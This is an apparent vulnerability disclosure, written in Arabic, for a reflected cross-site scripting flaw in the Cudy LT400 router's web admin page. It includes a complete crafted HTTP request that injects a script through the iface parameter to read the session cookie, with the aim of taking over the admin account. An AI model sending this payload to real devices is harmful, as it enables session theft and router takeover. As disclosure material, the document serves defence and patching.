
إثبات المفهوم لـ XSS المنعكس في واجهة ويب Cudy LT400، يوضح سرقة ملفات تعريف الارتباط للجلسة والاستيلاء على حساب المسؤول عبر طلبات مصممة.
توجد ثغرة من نوع هجوم البرمجة النصية عبر المواقع (XSS) المنعكس في واجهة الإدارة المستندة إلى الويب لجهاز Cudy LT400.
تحتوي الصفحة /cgi-bin/luci/admin/network/wireless/config على XSS منعكس عبر معامل iface.
تتضمن طرق الاستغلال إرسال طلب مصمم خصيصًا للضحية يتضمن تعليمات برمجية ضارة.
التطبيق المتأثر لا يضبط ملف تعريف الارتباط للجلسة مع خاصية HttpOnly؛ قد يؤدي ذلك إلى الاستيلاء على صلاحيات المسؤول عبر سرقة رمز الجلسة.
GET /cgi-bin/luci/admin/network/wireless/config?nomodal=&iface=wlan00%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3e HTTP/1.1
Host: 172.16.1.1
User-Agent: Mozilla/5.0
Accept: text/html, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://172.16.1.1/cgi-bin/luci/admin/setup
Cookie: sysauth=REDACTED
Shenzhen Cudy Technology